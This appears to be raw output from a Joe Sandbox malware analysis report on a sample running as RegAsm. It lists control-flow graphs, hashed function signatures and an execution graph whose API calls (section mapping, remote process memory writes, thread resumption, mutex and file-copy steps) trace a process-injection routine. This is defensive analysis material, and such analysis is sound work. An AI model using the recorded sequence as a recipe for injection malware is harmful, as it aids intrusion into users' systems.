                                  • Instruction Fuzzy Hash: 8D617F71A00244FBEB219F91CC49FAF7BB8FF85B00F10412AF912BA1E4D6749A01DB65

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 95 4014e8 96 4014e0-4014e5 95->96 97 4014ec-401519 call 401164 95->97 96->97 103 40151b 97->103 104 40151e-401523 97->104 103->104 106 401529-40153a 104->106 107 40184d-401855 104->107 110 401540-401569 106->110 111 40184b 106->111 107->104 112 40185a-401883 107->112 110->111 121 40156f-401586 NtDuplicateObject 110->121 111->112 119 401874-40187f 112->119 120 401886-4018a3 call 401164 112->120 119->120 121->111 122 40158c-4015b0 NtCreateSection 121->122 124 4015b2-4015d3 NtMapViewOfSection 122->124 125 40160c-401632 NtCreateSection 122->125 124->125 127 4015d5-4015f1 NtMapViewOfSection 124->127 125->111 129 401638-40163c 125->129 127->125 132 4015f3-401609 127->132 129->111 131 401642-401663 NtMapViewOfSection 129->131 131->111 134 401669-401685 NtMapViewOfSection 131->134 132->125 134->111 135 40168b call 401690 134->135
                                  APIs
                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.473707932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Section$View$Create$DuplicateObject
                                  • String ID:
                                  • API String ID: 1546783058-0
                                  • Opcode ID: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
                                  • Instruction ID: a9c2a09af8f6974916e8dbce0e9e74a1ab8539b6b4ce2c8be6c8dc9eb24f9302
                                  • Opcode Fuzzy Hash: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
                                  • Instruction Fuzzy Hash: 675127B5900245BBEB209F91CC48FABBBB8EF85B00F104169FA11BA2E5D6759941CB24

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 138 4014eb-401519 call 401164 143 40151b 138->143 144 40151e-401523 138->144 143->144 146 401529-40153a 144->146 147 40184d-401855 144->147 150 401540-401569 146->150 151 40184b 146->151 147->144 152 40185a-401883 147->152 150->151 161 40156f-401586 NtDuplicateObject 150->161 151->152 159 401874-40187f 152->159 160 401886-4018a3 call 401164 152->160 159->160 161->151 162 40158c-4015b0 NtCreateSection 161->162 164 4015b2-4015d3 NtMapViewOfSection 162->164 165 40160c-401632 NtCreateSection 162->165 164->165 167 4015d5-4015f1 NtMapViewOfSection 164->167 165->151 169 401638-40163c 165->169 167->165 172 4015f3-401609 167->172 169->151 171 401642-401663 NtMapViewOfSection 169->171 171->151 174 401669-401685 NtMapViewOfSection 171->174 172->165 174->151 175 40168b call 401690 174->175
                                  APIs
                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.473707932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Section$View$Create$DuplicateObject
                                  • String ID:
                                  • API String ID: 1546783058-0
                                  • Opcode ID: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
                                  • Instruction ID: 9bfdfe9cbb785be4fdfd0dd6995845ce59af7eac5c2f91023a42677e7735ba1d
                                  • Opcode Fuzzy Hash: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
                                  • Instruction Fuzzy Hash: 9D5127B5900248BBEB209F91CC48FAFBBB8EF85B00F104159FA11BA2E5D6719905CB64

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 178 4018c5-40190b call 401164 Sleep call 4013cc 188 40191a-401920 178->188 189 40190d-401915 call 4014bf 178->189 192 401931 188->192 193 401928-40192d 188->193 189->188 192->193 194 401934-40194f 192->194 193->194 199 401952-40195b call 401164 194->199 200 401948-40194b 194->200 200->199
                                  APIs
                                  • Sleep.KERNELBASE(00001388), ref: 004018F6
                                    • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                    • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.473707932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CreateDuplicateObjectSectionSleep
                                  • String ID: zOji
                                  • API String ID: 4152845823-4118548424
                                  • Opcode ID: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
                                  • Instruction ID: 5008de21d6646d6a4101a84352d49cb2eeb815b2728bacd1896cd8e4e39b07a0
                                  • Opcode Fuzzy Hash: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
                                  • Instruction Fuzzy Hash: 46018BB2308205EBDB006E949C61EAE3658AB40724F308033F607780F1C67D8A13F31B

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 203 4018a6-4018c3 207 4018d4 203->207 208 4018c8-40190b call 401164 Sleep call 4013cc 203->208 207->208 218 40191a-401920 208->218 219 40190d-401915 call 4014bf 208->219 222 401931 218->222 223 401928-40192d 218->223 219->218 222->223 224 401934-40194f 222->224 223->224 229 401952-40195b call 401164 224->229 230 401948-40194b 224->230 230->229
                                  APIs
                                  • Sleep.KERNELBASE(00001388), ref: 004018F6
                                    • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                    • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.473707932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CreateDuplicateObjectSectionSleep
                                  • String ID:
                                  • API String ID: 4152845823-0
                                  • Opcode ID: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
                                  • Instruction ID: ec7c9f9116aa5c3d7af92c99ccf4db412f3ff1557a2b92ce3f8b18b7d449fb36
                                  • Opcode Fuzzy Hash: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
                                  • Instruction Fuzzy Hash: 97016DB2308305EBE7006A959C51EBA3758AB41764F308133B607780F1957D9A17B36F

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 233 4018be-4018c3 237 4018d4 233->237 238 4018c8-40190b call 401164 Sleep call 4013cc 233->238 237->238 248 40191a-401920 238->248 249 40190d-401915 call 4014bf 238->249 252 401931 248->252 253 401928-40192d 248->253 249->248 252->253 254 401934-40194f 252->254 253->254 259 401952-40195b call 401164 254->259 260 401948-40194b 254->260 260->259
                                  APIs
                                  • Sleep.KERNELBASE(00001388), ref: 004018F6
                                    • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                    • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.473707932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CreateDuplicateObjectSectionSleep
                                  • String ID:
                                  • API String ID: 4152845823-0
                                  • Opcode ID: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
                                  • Instruction ID: cc5cf84a4ac16d3ff6e0150408ab5a4d949569ac012fe2ee23f61dbe8ee8ec54
                                  • Opcode Fuzzy Hash: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
                                  • Instruction Fuzzy Hash: 70014CB2308205EBDB106A959C51EBE3659AB55714F308133B607784F1967D9B13F32B

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 263 4018b1-4018b3 264 401903-40190b call 4013cc 263->264 265 4018b5-4018c3 263->265 271 40191a-401920 264->271 272 40190d-401915 call 4014bf 264->272 269 4018d4 265->269 270 4018c8-401900 call 401164 Sleep 265->270 269->270 270->264 278 401931 271->278 279 401928-40192d 271->279 272->271 278->279 282 401934-40194f 278->282 279->282 288 401952-40195b call 401164 282->288 289 401948-40194b 282->289 289->288
                                  APIs
                                  • Sleep.KERNELBASE(00001388), ref: 004018F6
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.473707932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
                                  • Instruction ID: ef1b3772686a797e33556ea01ceab6b668eb93d7b49977ee198856b5a882b22d
                                  • Opcode Fuzzy Hash: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
                                  • Instruction Fuzzy Hash: 210125B2208245EADB006A959C61EBA3799AB41724F308137F607790F1967E8A13F31B

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 292 4018c2-40190b call 401164 Sleep call 4013cc 304 40191a-401920 292->304 305 40190d-401915 call 4014bf 292->305 308 401931 304->308 309 401928-40192d 304->309 305->304 308->309 310 401934-40194f 308->310 309->310 315 401952-40195b call 401164 310->315 316 401948-40194b 310->316 316->315
                                  APIs
                                  • Sleep.KERNELBASE(00001388), ref: 004018F6
                                    • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                    • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.473707932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CreateDuplicateObjectSectionSleep
                                  • String ID:
                                  • API String ID: 4152845823-0
                                  • Opcode ID: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                                  • Instruction ID: d3c1b2561fc0583f1f6bbc3edf5ccb050f557452f45edf8007d0f6b78c0567ac
                                  • Opcode Fuzzy Hash: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                                  • Instruction Fuzzy Hash: 14017CB2308205EBDB006A919C51EBE3759AB41724F308133F607780F1967D8A13F31B

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 319 4018da-40190b call 401164 Sleep call 4013cc 326 40191a-401920 319->326 327 40190d-401915 call 4014bf 319->327 330 401931 326->330 331 401928-40192d 326->331 327->326 330->331 332 401934-40194f 330->332 331->332 337 401952-40195b call 401164 332->337 338 401948-40194b 332->338 338->337
                                  APIs
                                  • Sleep.KERNELBASE(00001388), ref: 004018F6
                                    • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                    • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.473707932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CreateDuplicateObjectSectionSleep
                                  • String ID:
                                  • API String ID: 4152845823-0
                                  • Opcode ID: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
                                  • Instruction ID: 8f9a98739febab8b32419077b991bda00f1387bd451c7178a571841fb0c6b49c
                                  • Opcode Fuzzy Hash: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
                                  • Instruction Fuzzy Hash: A8F044B6204205EBDB006E959C51FAE3768AB44725F344133F612790F1C67D8A52F71B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.473707932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ac7e7057e694f927fede870acec150b85549b59082852c908f6cb04236d2f2d8
                                  • Instruction ID: 23ebd0781da1908b0313adc4825bdad519a2322fd185fd58dfeec4c7364fa306
                                  • Opcode Fuzzy Hash: ac7e7057e694f927fede870acec150b85549b59082852c908f6cb04236d2f2d8
                                  • Instruction Fuzzy Hash: 9941742500DBC55FC7138F7089661AA7F74FE1372171940EFC8819B6A3C7299A0BC79A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.473707932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
                                  • Instruction ID: 407047d8813846ed623c6620c5c661c30d6a874651c06bbb2e7ade0d14a7dce7
                                  • Opcode Fuzzy Hash: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
                                  • Instruction Fuzzy Hash: 92117D2020C541FCD321D27CCA0C911BFA99B4F72075401FBD691250C3DAB9094AEBAB
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.473707932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
                                  • Instruction ID: 5db6927ec116302fd1a3f9be718c7712ee400501de5b38768fcc91fc62191cbb
                                  • Opcode Fuzzy Hash: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
                                  • Instruction Fuzzy Hash: 56117D2024C581ECD321D37CCA48914BFA69B4F72076801FBD691694C3CAB9454AEBAB
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.473707932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
                                  • Instruction ID: 863a443b315763638c31dffea77139fa9fc7248c2f9879795720f54bbf800da4
                                  • Opcode Fuzzy Hash: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
                                  • Instruction Fuzzy Hash: 4F115C2020C941ADD321D37CCA08914BFA59B4F72075802FBD6915A0C6CA79454AEF97
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.473707932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
                                  • Instruction ID: 0c8bb5551e2abd97a64ae9c19d193427848800bdc9eaee9e975189e24a5225cd
                                  • Opcode Fuzzy Hash: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
                                  • Instruction Fuzzy Hash: 56112C2020C581EDD321D27CCA09514BF959B4F72475801FBD691690C6DA79454AEB9B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.473707932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
                                  • Instruction ID: f976abf0b506ce6ff8f37bbd7c8af7624669eab2ab4b5b0fb9c0d747e7254d45
                                  • Opcode Fuzzy Hash: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
                                  • Instruction Fuzzy Hash: 1601472124C991BCE331E33CC908904BFE69B4FB6475802FAD2A15A0C7DA214589DFE7
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.473707932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
                                  • Instruction ID: c5c43ab6752ee8d18fcb74b59ff98ad39f6596117cd62c5b2c77ced72334e6aa
                                  • Opcode Fuzzy Hash: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
                                  • Instruction Fuzzy Hash: B111E2321002609FDF21AF24C49569AFBB2FF4530C375A188C9969B111E722AD8FCB91
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.473707932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
                                  • Instruction ID: c48700b05c06e988df87cd580ca5e4308363d13747befdac9a33251d9afddee9
                                  • Opcode Fuzzy Hash: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
                                  • Instruction Fuzzy Hash: 8EF0227101036187CF18AB389498198BBA1EE46668798079EDDA2770D2E327A4A9CB90

                                  Execution Graph

                                  Execution Coverage:57.6%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:10.8%
                                  Total number of Nodes:157
                                  Total number of Limit Nodes:9
                                  execution_graph 1129 26e1952 1132 26e1980 1129->1132 1142 26e19d0 1132->1142 1135 26e1973 1136 26e199b SleepEx 1136->1136 1137 26e19ab 1136->1137 1150 26e21c4 1137->1150 1144 26e1a07 1142->1144 1143 26e1992 1143->1135 1143->1136 1144->1143 1145 26e1ad0 RtlCreateHeap 1144->1145 1147 26e1b01 1145->1147 1146 26e1b0c LoadLibraryA 1146->1143 1146->1147 1147->1146 1148 26e1b3b 1147->1148 1148->1143 1149 26e1c80 CreateThread CloseHandle CreateThread 1148->1149 1149->1143 1168 26e3bf4 1149->1168 1176 26e3cd0 1149->1176 1151 26e21e2 1150->1151 1179 26e4a40 1151->1179 1153 26e19c0 1154 26e1d8c 1153->1154 1185 26e4c90 1154->1185 1156 26e1dc7 1157 26e1df8 CreateMutexExA 1156->1157 1158 26e1e12 1157->1158 1191 26e4e00 1158->1191 1160 26e1e51 1200 26e1f04 1160->1200 1165 26e1ebe 1166 26e1ee9 SleepEx 1165->1166 1212 26e226c 1165->1212 1218 26e2cd0 1165->1218 1166->1165 1166->1166 1169 26e3cab 1168->1169 1170 26e3c11 CreateToolhelp32Snapshot 1168->1170 1171 26e3c25 Process32First 1170->1171 1172 26e3c93 SleepEx 1170->1172 1174 26e3c3d 1171->1174 1172->1169 1172->1170 1173 26e3c8a CloseHandle 1173->1172 1174->1173 1175 26e3c78 Process32Next 1174->1175 1175->1174 1177 26e3d06 1176->1177 1178 26e3ce2 EnumWindows SleepEx 1176->1178 1178->1177 1178->1178 1180 26e4a69 1179->1180 1181 26e4a7d GetTokenInformation 1180->1181 1184 26e4ada 1180->1184 1182 26e4aa8 1181->1182 1183 26e4ab2 GetTokenInformation 1182->1183 1183->1184 1184->1153 1186 26e4cbd GetVolumeInformationA 1185->1186 1188 26e4d10 1186->1188 1226 26e5174 CryptAcquireContextA 1188->1226 1190 26e4d50 1190->1156 1228 26e4f1c 1191->1228 1193 26e4e22 RegOpenKeyExA 1194 26e4ed3 1193->1194 1197 26e4e4f 1193->1197 1195 26e4ede ObtainUserAgentString 1194->1195 1195->1160 1196 26e4e63 RegQueryValueExA 1196->1197 1197->1196 1198 26e4ec9 RegCloseKey 1197->1198 1199 26e4eb6 1197->1199 1198->1194 1199->1198 1201 26e1f27 1200->1201 1202 26e1e7d CreateFileMappingA 1201->1202 1203 26e1f8b DeleteFileW CopyFileW 1201->1203 1211 26e203e 1201->1211 1202->1165 1203->1202 1204 26e1fab DeleteFileW 1203->1204 1207 26e1fc1 1204->1207 1206 26e205b CreateFileW 1206->1202 1208 26e1ff6 DeleteFileW 1207->1208 1209 26e200a 1208->1209 1236 26e4920 1209->1236 1230 26e3490 1211->1230 1213 26e229d 1212->1213 1243 26e32ec CreateFileW 1213->1243 1215 26e22b2 1249 26e230c 1215->1249 1217 26e22c3 1217->1165 1219 26e32ec 3 API calls 1218->1219 1224 26e2cf3 1219->1224 1220 26e2f55 1220->1165 1221 26e2f34 SleepEx 1221->1220 1221->1224 1224->1220 1224->1221 1225 26e2efa ResumeThread 1224->1225 1289 26e4578 1224->1289 1293 26e2fac 1224->1293 1225->1224 1227 26e51b9 1226->1227 1227->1190 1229 26e4f4c 1228->1229 1229->1193 1231 26e34b1 1230->1231 1232 26e34d1 GetUserNameW 1231->1232 1233 26e34f2 1232->1233 1241 26e35e8 CoCreateInstance 1233->1241 1235 26e350d 1235->1206 1237 26e4947 1236->1237 1238 26e4967 SetFileAttributesW CreateFileW 1237->1238 1239 26e49b2 SetFileTime 1238->1239 1240 26e49d3 1239->1240 1240->1211 1242 26e3646 1241->1242 1245 26e3341 1243->1245 1247 26e33b5 1243->1247 1244 26e33ac CloseHandle 1244->1247 1245->1244 1246 26e3360 ReadFile 1245->1246 1248 26e338f 1246->1248 1247->1215 1248->1244 1273 26e3de0 1249->1273 1251 26e2594 1252 26e279d 1251->1252 1253 26e25b8 1251->1253 1254 26e3de0 2 API calls 1252->1254 1256 26e26f9 1253->1256 1264 26e25d0 1253->1264 1265 26e2657 1253->1265 1258 26e27c4 1254->1258 1255 26e235f 1255->1251 1259 26e24df DeleteFileW CreateFileW 1255->1259 1266 26e26b8 1255->1266 1257 26e3de0 2 API calls 1256->1257 1261 26e2720 1257->1261 1260 26e2840 2 API calls 1258->1260 1258->1266 1259->1251 1267 26e2522 1259->1267 1260->1266 1263 26e2840 2 API calls 1261->1263 1261->1266 1262 26e3de0 2 API calls 1262->1264 1263->1266 1264->1262 1264->1265 1264->1266 1277 26e2840 1264->1277 1265->1266 1268 26e3de0 2 API calls 1265->1268 1266->1217 1269 26e255b WriteFile 1267->1269 1268->1266 1271 26e2582 1269->1271 1272 26e4920 3 API calls 1271->1272 1272->1251 1274 26e3e0f 1273->1274 1283 26e3f7c 1274->1283 1276 26e3f2f 1276->1255 1278 26e2849 1277->1278 1280 26e2c63 1277->1280 1279 26e3f7c 2 API calls 1278->1279 1282 26e2948 1278->1282 1279->1282 1280->1264 1281 26e3de0 2 API calls 1281->1280 1282->1280 1282->1281 1287 26e3fbf 1283->1287 1288 26e3fc6 1283->1288 1284 26e4276 RtlAllocateHeap 1285 26e42a3 1284->1285 1286 26e42af RtlReAllocateHeap 1285->1286 1285->1287 1286->1285 1288->1284 1288->1287 1290 26e45a8 1289->1290 1291 26e461c CreateProcessInternalW 1290->1291 1292 26e466f 1291->1292 1292->1224 1294 26e2fe3 1293->1294 1295 26e32c2 1294->1295 1313 26e4760 1294->1313 1298 26e4760 NtCreateSection 1299 26e305b 1298->1299 1299->1295 1300 26e4760 NtCreateSection 1299->1300 1301 26e308a 1300->1301 1302 26e4760 NtCreateSection 1301->1302 1303 26e30da 1302->1303 1304 26e31b8 NtQueryInformationProcess 1303->1304 1305 26e3198 NtQueryInformationProcess 1303->1305 1306 26e31df 1304->1306 1305->1306 1307 26e32ae CloseHandle 1306->1307 1308 26e31e7 ReadProcessMemory 1306->1308 1307->1295 1317 26e5328 1308->1317 1310 26e3212 ReadProcessMemory 1311 26e3236 1310->1311 1312 26e329f WriteProcessMemory 1311->1312 1312->1307 1314 26e4793 1313->1314 1316 26e302b 1313->1316 1315 26e47b1 NtCreateSection 1314->1315 1314->1316 1315->1316 1316->1298

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available
                                  callgraph 0 Function_026E32EC 19 Function_026E52CC 0->19 21 Function_026E4FC8 0->21 38 Function_026E5328 0->38 58 Function_026E4F1C 0->58 1 Function_026E17EC 2 Function_026E226C 2->0 2->19 48 Function_026E230C 2->48 3 Function_026E5368 4 Function_026E35E8 4->19 4->58 5 Function_026E4BE4 6 Function_026E1062 7 Function_026E4760 30 Function_026E53D8 7->30 8 Function_026E3DE0 10 Function_026E3F7C 8->10 8->19 8->38 47 Function_026E48B0 8->47 53 Function_026E5384 8->53 9 Function_026E4860 10->3 16 Function_026E5274 10->16 10->19 10->21 26 Function_026E43C0 10->26 10->38 44 Function_026E4434 10->44 10->53 10->58 11 Function_026E177C 12 Function_026E49FC 13 Function_026E4578 13->19 13->38 13->58 14 Function_026E3BF4 45 Function_026E50B0 14->45 60 Function_026E4714 14->60 15 Function_026E5174 17 Function_026E13F4 18 Function_026E1175 20 Function_026E354C 20->19 20->38 20->58 22 Function_026E5348 23 Function_026E21C4 25 Function_026E4A40 23->25 24 Function_026E1045 25->19 25->30 25->38 26->38 26->53 27 Function_026E2840 27->8 27->10 27->19 27->21 27->22 28 Function_026E50DC 27->28 29 Function_026E39DC 27->29 27->38 27->58 29->22 61 Function_026E3A94 29->61 31 Function_026E1456 32 Function_026E11D4 32->17 33 Function_026E1952 55 Function_026E1980 33->55 34 Function_026E2CD0 34->0 34->13 34->19 34->21 37 Function_026E2FAC 34->37 34->38 50 Function_026E4D8C 34->50 35 Function_026E3CD0 36 Function_026E19D0 36->14 36->19 36->35 51 Function_026E1D08 36->51 36->58 59 Function_026E4B1C 36->59 37->7 37->9 37->19 37->21 37->38 37->61 39 Function_026E6229 40 Function_026E4920 40->19 40->38 41 Function_026E46A0 41->60 42 Function_026E3D20 42->30 42->45 42->60 43 Function_026E1938 46 Function_026E53B0 47->53 48->3 48->8 48->19 48->21 48->22 48->27 48->28 48->40 48->41 48->58 49 Function_026E1D8C 49->2 49->16 49->19 49->34 49->38 49->46 52 Function_026E1F04 49->52 56 Function_026E4E00 49->56 49->58 62 Function_026E4C90 49->62 50->21 50->38 51->59 52->19 52->38 52->40 52->50 52->58 63 Function_026E3490 52->63 54 Function_026E1803 55->23 55->36 55->49 56->19 56->28 56->58 57 Function_026E1501 58->21 58->38 59->5 59->45 62->15 62->19 62->38 62->58 63->4 63->19 63->20 63->38

                                  Control-flow Graph

                                  APIs
